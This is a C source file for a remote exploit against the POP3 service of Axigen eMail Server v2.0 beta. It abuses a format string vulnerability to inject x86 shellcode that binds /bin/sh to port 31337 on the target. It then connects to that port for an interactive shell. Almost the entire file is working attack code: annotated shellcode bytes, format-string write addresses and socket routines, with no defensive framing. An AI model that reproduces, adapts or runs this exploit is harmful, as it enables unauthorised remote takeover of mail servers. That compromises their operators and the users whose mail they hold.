|
/* axiagen.c
*
* Axigen eMail Server v2.0 (beta)
* by fuGich Tue Dec 5 2006
*
* thanks to mu-b
*
* - Tested on: Axigen V2 (beta)
*
* logType for the pop3 service must be "system" and
* the logLevel set to any number with 4th bit set
*
* remote shell format string vulnerability in pop3
* /bin/sh to bind to port 31337
*
* optimised format string generated with libforSC
* used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
char formatString[] =
// plt fixup code
"\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx
"\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx)
"\x8d\x52\x04" // lea 0x4(%edx),%edx
"\xc6\x02\xaa" // movb $0xaa,(%edx)
"\x90\x90\x90" // make divisible by 8
//
// bind shell with fork to port 31337 98 bytes
//
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x99" // cltd
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
//
// <_doint>:
//
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x5b" // pop %ebx
"\x5d" // pop %ebp
"\x52" // push %edx
"\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
"\x0f\xcd" // bswap %ebp
"\x09\xdd" // or %ebx,%ebp
"\x55" // push %ebp
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
//
// <_acceptloop>:
//
"\x5f" // pop %edi
"\x50" // push %eax
"\x50" // push %eax
"\x57" // push %edi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchg %eax,%ebx
"\xb0\x02" // mov $0x2,%al
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x1a" // jne <_parent>
"\x59" // pop %ecx
//
// <_dup2loop>:
//
"\xb0\x3f" // mov $0x3f,%al
"\xcd\x80" // int $0x80
"\x49" // dec %ecx
"\x79\xf9" // jns <_dup2loop>
"\xb0\x0b" // mov $0xb,%al
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\xeb\xb2" // jmp <_doint>
//
// <_parent>:
//
"\x6a\x06" // push $0x6
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xeb\xc9" // jmp <_acceptloop>
//
// 9 write addresses
//
"\xd8\xbe\x85\x09" // pointer @ 0x0985bed8
"\xd9\xbe\x85\x09"
"\xda\xbe\x85\x09"
"\xdb\xbe\x85\x09"
"\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0
"\xe1\xbe\x85\x09"
"\xe2\xbe\x85\x09"
"\xe3\xbe\x85\x09"
"\xe4\xbe\x85\x09"
// add the format string
"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n";
static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);
void shell (int sock){ /* Attach to Remote Shell */
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("\n - Connection closed by remote host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
printf ("\n - Read failure\n");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int sockami (u_char * host, int port){ /* create the socket */
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL){
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void formatme (u_char * host){ /* do the evil */
int sock;
printf ("+Connecting to %s:%d ", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
printf ("\n+Sending format string\n");
sock_send (sock, formatString, strlen (formatString));
fflush (stdout);
sleep(2);
printf ("+Connecting to Shell ");
sock = sockami (host, 31337);
printf ("- Done\n");
shell(sock);
}
int main (int argc, char **argv){ /* go figure */
printf ("Axigen 2.0 beta Remote pop3 exploit\n"
"by: <fuGich@gmail.com>\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n\n", argv[0]);
exit (EXIT_SUCCESS);
}
formatme (argv[1]);
}
|
